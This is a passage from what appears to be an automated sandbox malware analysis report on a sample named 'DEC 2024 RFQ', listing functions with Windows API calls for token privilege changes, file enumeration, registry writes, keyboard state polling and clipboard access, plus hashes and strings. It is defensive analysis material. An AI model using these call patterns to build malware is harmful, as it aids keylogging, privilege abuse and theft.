                                                                                                                        • Part of subcall function 000787E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0007882B
                                                                                                                        • Part of subcall function 000787E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00078858
                                                                                                                        • Part of subcall function 000787E1: GetLastError.KERNEL32 ref: 00078865
                                                                                                                      • _memset.LIBCMT ref: 00078353
                                                                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 000783A5
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 000783B6
                                                                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 000783CD
                                                                                                                      • GetProcessWindowStation.USER32 ref: 000783E6
                                                                                                                      • SetProcessWindowStation.USER32(00000000), ref: 000783F0
                                                                                                                      • OpenDesktopW.USER32(default,00000000,00000000,|$$), ref: 0007840A
                                                                                                                        • Part of subcall function 000781CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00078309), ref: 000781E0
                                                                                                                        • Part of subcall function 000781CB: CloseHandle.KERNEL32(?,?,00078309), ref: 000781F2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                      • String ID: $default$winsta0$|$$
                                                                                                                      • API String ID: 2063423040-991071530
                                                                                                                      • Opcode ID: c1e0b534793e50fd4e7d52476cf31fc09a42f14b178066558e54400835f52c84
                                                                                                                      • Instruction ID: 31f6cbb507090bce1f1c7eb12cd46f1b9bb1cca7c6043a44bf4efe3234d96483
                                                                                                                      • Opcode Fuzzy Hash: c1e0b534793e50fd4e7d52476cf31fc09a42f14b178066558e54400835f52c84
                                                                                                                      • Instruction Fuzzy Hash: 868189B1D40249AFDF519FA4CC49AFE7BB8EF04304F14C069F918A6261DB398E54DB28
                                                                                                                      Function 0008C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0008C78D
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0008C7E1
                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0008C806
                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0008C81D
                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0008C844
                                                                                                                      • __swprintf.LIBCMT ref: 0008C890
                                                                                                                      • __swprintf.LIBCMT ref: 0008C8D3
                                                                                                                        • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
                                                                                                                      • __swprintf.LIBCMT ref: 0008C927
                                                                                                                        • Part of subcall function 00043698: __woutput_l.LIBCMT ref: 000436F1
                                                                                                                      • __swprintf.LIBCMT ref: 0008C975
                                                                                                                        • Part of subcall function 00043698: __flsbuf.LIBCMT ref: 00043713
                                                                                                                        • Part of subcall function 00043698: __flsbuf.LIBCMT ref: 0004372B
                                                                                                                      • __swprintf.LIBCMT ref: 0008C9C4
                                                                                                                      • __swprintf.LIBCMT ref: 0008CA13
                                                                                                                      • __swprintf.LIBCMT ref: 0008CA62
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                      • API String ID: 3953360268-2428617273
                                                                                                                      • Opcode ID: 9137f8735b195e0feb17219d7da417a0015c7e7a746515b5b4b7d11bc04a42df
                                                                                                                      • Instruction ID: 981af7e1e08881d5876a9fe9b4391289603c496a4bb1c1cb3625b8e88c6747aa
                                                                                                                      • Opcode Fuzzy Hash: 9137f8735b195e0feb17219d7da417a0015c7e7a746515b5b4b7d11bc04a42df
                                                                                                                      • Instruction Fuzzy Hash: 9DA14DB1408315ABD714EFA4D885EEFB7ECFF95704F40492AF58586192EB34DA08CB62
                                                                                                                      Function 0008EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0008EFB6
                                                                                                                      • _wcscmp.LIBCMT ref: 0008EFCB
                                                                                                                      • _wcscmp.LIBCMT ref: 0008EFE2
                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 0008EFF4
                                                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 0008F00E
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0008F026
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0008F031
                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0008F04D
                                                                                                                      • _wcscmp.LIBCMT ref: 0008F074
                                                                                                                      • _wcscmp.LIBCMT ref: 0008F08B
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0008F09D
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(000D8920), ref: 0008F0BB
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0008F0C5
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0008F0D2
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0008F0E4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 1803514871-438819550
                                                                                                                      • Opcode ID: 85dfd6bd1b9ab819e3203e35ca6c921971c329999d4621c2ec1b13120d2b4699
                                                                                                                      • Instruction ID: 6b447c5f098ca86bf431172cffe8d848ecc35295950ab56ab3a5f36a69224eb8
                                                                                                                      • Opcode Fuzzy Hash: 85dfd6bd1b9ab819e3203e35ca6c921971c329999d4621c2ec1b13120d2b4699
                                                                                                                      • Instruction Fuzzy Hash: 2F31D43250060A6EDB14ABF4DC48BFEB7ECAF49360F144276E980D2192DB74DA80CF65
                                                                                                                      Function 000A0857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000A0953
                                                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,000AF910,00000000,?,00000000,?,?), ref: 000A09C1
                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 000A0A09
                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 000A0A92
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 000A0DB2
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 000A0DBF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$ConnectCreateRegistryValue
                                                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                      • API String ID: 536824911-966354055
                                                                                                                      • Opcode ID: df9533a96793c80362ef2ff2a8cf83b5243c4731dc6dc8a207144a174dcaef96
                                                                                                                      • Instruction ID: 7f10709c8f388a65abd7a3a4d18fa64fcb37e1f79336d9b70ee8b6ed9d532ecc
                                                                                                                      • Opcode Fuzzy Hash: df9533a96793c80362ef2ff2a8cf83b5243c4731dc6dc8a207144a174dcaef96
                                                                                                                      • Instruction Fuzzy Hash: A0028D756006119FCB54EF64D845E6AB7E5FF8A720F04896DF88A9B362CB30EC41CB85
                                                                                                                      Function 0008F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0008F113
                                                                                                                      • _wcscmp.LIBCMT ref: 0008F128
                                                                                                                      • _wcscmp.LIBCMT ref: 0008F13F
                                                                                                                        • Part of subcall function 00084385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 000843A0
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0008F16E
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0008F179
                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0008F195
                                                                                                                      • _wcscmp.LIBCMT ref: 0008F1BC
                                                                                                                      • _wcscmp.LIBCMT ref: 0008F1D3
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0008F1E5
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(000D8920), ref: 0008F203
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0008F20D
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0008F21A
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0008F22C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 1824444939-438819550
                                                                                                                      • Opcode ID: 9b5214b63809ee3a8b3c6fe59d650b6115ea465c58b41c96efc7e811941cf37a
                                                                                                                      • Instruction ID: 91ef943dda770ac0b7b6e6d448c261dacb9130e236d70d9550d4a46159d8a650
                                                                                                                      • Opcode Fuzzy Hash: 9b5214b63809ee3a8b3c6fe59d650b6115ea465c58b41c96efc7e811941cf37a
                                                                                                                      • Instruction Fuzzy Hash: DD31C63650061B6ADF20ABB4EC59BFEB7ACAF45360F140171E980E2191DB34DE85CB68
                                                                                                                      Function 0008A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0008A20F
                                                                                                                      • __swprintf.LIBCMT ref: 0008A231
                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0008A26E
                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0008A293
                                                                                                                      • _memset.LIBCMT ref: 0008A2B2
                                                                                                                      • _wcsncpy.LIBCMT ref: 0008A2EE
                                                                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0008A323
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0008A32E
                                                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 0008A337
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0008A341
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                      • String ID: :$\$\??\%s
                                                                                                                      • API String ID: 2733774712-3457252023
                                                                                                                      • Opcode ID: 5e98dee262534ea1954c6d94bda606fc4dd107c07de24d217cb27067ce6ccb03
                                                                                                                      • Instruction ID: 4a38e7647a13e92ef9111c6c1acfb70020fdacb6c4d7b2b938bba34877b98c45
                                                                                                                      • Opcode Fuzzy Hash: 5e98dee262534ea1954c6d94bda606fc4dd107c07de24d217cb27067ce6ccb03
                                                                                                                      • Instruction Fuzzy Hash: 693180B2A0010AABEB219FA0DC49FEB37BCFF8A740F1041B6F548D6161E77497448B25
                                                                                                                      Function 00077CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00078202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0007821E
                                                                                                                        • Part of subcall function 00078202: GetLastError.KERNEL32(?,00077CE2,?,?,?), ref: 00078228
                                                                                                                        • Part of subcall function 00078202: GetProcessHeap.KERNEL32(00000008,?,?,00077CE2,?,?,?), ref: 00078237
                                                                                                                        • Part of subcall function 00078202: HeapAlloc.KERNEL32(00000000,?,00077CE2,?,?,?), ref: 0007823E
                                                                                                                        • Part of subcall function 00078202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00078255
                                                                                                                        • Part of subcall function 0007829F: GetProcessHeap.KERNEL32(00000008,00077CF8,00000000,00000000,?,00077CF8,?), ref: 000782AB
                                                                                                                        • Part of subcall function 0007829F: HeapAlloc.KERNEL32(00000000,?,00077CF8,?), ref: 000782B2
                                                                                                                        • Part of subcall function 0007829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00077CF8,?), ref: 000782C3
                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00077D13
                                                                                                                      • _memset.LIBCMT ref: 00077D28
                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00077D47
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00077D58
                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00077D95
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00077DB1
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00077DCE
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00077DDD
                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00077DE4
                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00077E05
                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 00077E0C
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00077E3D
                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00077E63
                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00077E77
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3996160137-0
                                                                                                                      • Opcode ID: 8076a299490017258e9dc849de0897ee0084a83123bafd44f96c9ad3a8091db2
                                                                                                                      • Instruction ID: c8b8b0d8a1356fcd9c69e89598e76b89f6616e033de2ee2e3dfd72f445da1deb
                                                                                                                      • Opcode Fuzzy Hash: 8076a299490017258e9dc849de0897ee0084a83123bafd44f96c9ad3a8091db2
                                                                                                                      • Instruction Fuzzy Hash: D4613A71D0450AAFDF10DFA4DC44EEEBBB9FF09340F048169E919A7291DB399A05CB64
                                                                                                                      Function 000366E1 Relevance: 19.6, Strings: 15, Instructions: 889COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$p9dowp0dowp2dowp0dowp0dowp0dowp0dowp6dowpadowp0dowp0dowp6dowp8dowp0dowp0dowp0dowp0dowp0dowp0dowp0dowp8dowp6dowpadowp4dowp0dowp8dow
                                                                                                                      • API String ID: 0-2157299511
                                                                                                                      • Opcode ID: e946cca210fc94b79266a9df62057804ca3bcc8f5485f4f0ce336f0d6857ede9
                                                                                                                      • Instruction ID: 09f6bf7277f4c21d09d45c0b3d557d73a5c63daa99b815a8e3a5564c0c1569ad
                                                                                                                      • Opcode Fuzzy Hash: e946cca210fc94b79266a9df62057804ca3bcc8f5485f4f0ce336f0d6857ede9
                                                                                                                      • Instruction Fuzzy Hash: 7B725D75E00619DBDB25CF58C8807EEB7F9BF48310F14C16AE809EB291DB759A81CB94
                                                                                                                      Function 0008001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?), ref: 00080097
                                                                                                                      • SetKeyboardState.USER32(?), ref: 00080102
                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00080122
                                                                                                                      • GetKeyState.USER32(000000A0), ref: 00080139
                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00080168
                                                                                                                      • GetKeyState.USER32(000000A1), ref: 00080179
                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 000801A5
                                                                                                                      • GetKeyState.USER32(00000011), ref: 000801B3
                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 000801DC
                                                                                                                      • GetKeyState.USER32(00000012), ref: 000801EA
                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00080213
                                                                                                                      • GetKeyState.USER32(0000005B), ref: 00080221
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 541375521-0
                                                                                                                      • Opcode ID: 26efe4285debbdf49ef9ee242acd2dd64c11e45062a781a55cd1aef6d355aaec
                                                                                                                      • Instruction ID: 63fb10b27121bdfa03c011c14249cec391afa417dba4f6125806bfd2e0fdff48
                                                                                                                      • Opcode Fuzzy Hash: 26efe4285debbdf49ef9ee242acd2dd64c11e45062a781a55cd1aef6d355aaec
                                                                                                                      • Instruction Fuzzy Hash: 64519A309047882DFFB5FBB088557EABFF4AF11380F08459995C6565C3DAA49B8CCB61
                                                                                                                      Function 000A03DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 000A0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0009FDAD,?,?), ref: 000A0E31
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000A04AC
                                                                                                                        • Part of subcall function 00029837: __itow.LIBCMT ref: 00029862
                                                                                                                        • Part of subcall function 00029837: __swprintf.LIBCMT ref: 000298AC
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 000A054B
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 000A05E3
                                                                                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 000A0822
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 000A082F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1240663315-0
                                                                                                                      • Opcode ID: 9829a997e605f6e07fa8b3afab394372836a4a64c8f4c6a583c45bdc24fe7522
                                                                                                                      • Instruction ID: c576fb8d698d18157b8745cd0e492da82905c0cab1e726ae9aad74600c80653f
                                                                                                                      • Opcode Fuzzy Hash: 9829a997e605f6e07fa8b3afab394372836a4a64c8f4c6a583c45bdc24fe7522
                                                                                                                      • Instruction Fuzzy Hash: 8CE17F71604215AFCB14DF64C895D6EBBE4FF8A714F04896DF44ADB262DA30ED01CB91
                                                                                                                      Function 00094164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1737998785-0
                                                                                                                      • Opcode ID: baa1c140bd65918c65852418962cecf3b364c8a43d24077d825d9c9a845fd748
                                                                                                                      • Instruction ID: b8e1e2ab90f68ae002730d7d1579edb3afdc9f50ff2c4647a0fb38410a6199ed
                                                                                                                      • Opcode Fuzzy Hash: baa1c140bd65918c65852418962cecf3b364c8a43d24077d825d9c9a845fd748
